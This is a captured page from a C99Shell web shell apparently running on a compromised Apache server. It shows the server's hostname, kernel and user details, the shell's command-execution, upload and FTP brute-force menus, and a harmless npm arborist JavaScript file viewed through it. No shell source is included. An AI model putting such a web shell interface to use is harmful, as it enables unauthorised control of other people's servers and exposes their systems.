!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/.nvm/versions/node/v18.17.1/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/   drwxr-xr-x
Free 25.72 GB of 117.98 GB (21.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     get-workspace-nodes.js (863 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
// Get the actual nodes corresponding to a root node's child workspaces,
// given a list of workspace names.

const log = require('proc-log')
const relpath = require('./relpath.js')

const getWorkspaceNodes = (tree, workspaces) => {
  const wsMap = tree.workspaces
  if (!wsMap) {
    log.warn('workspaces', 'filter set, but no workspaces present')
    return []
  }

  const nodes = []
  for (const name of workspaces) {
    const path = wsMap.get(name)
    if (!path) {
      log.warn('workspaces', `${name} in filter set, but not in workspaces`)
      continue
    }

    const loc = relpath(tree.realpath, path)
    const node = tree.inventory.get(loc)

    if (!node) {
      log.warn('workspaces', `${name} in filter set, but no workspace folder present`)
      continue
    }

    nodes.push(node)
  }

  return nodes
}

module.exports = getWorkspaceNodes

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0032 ]--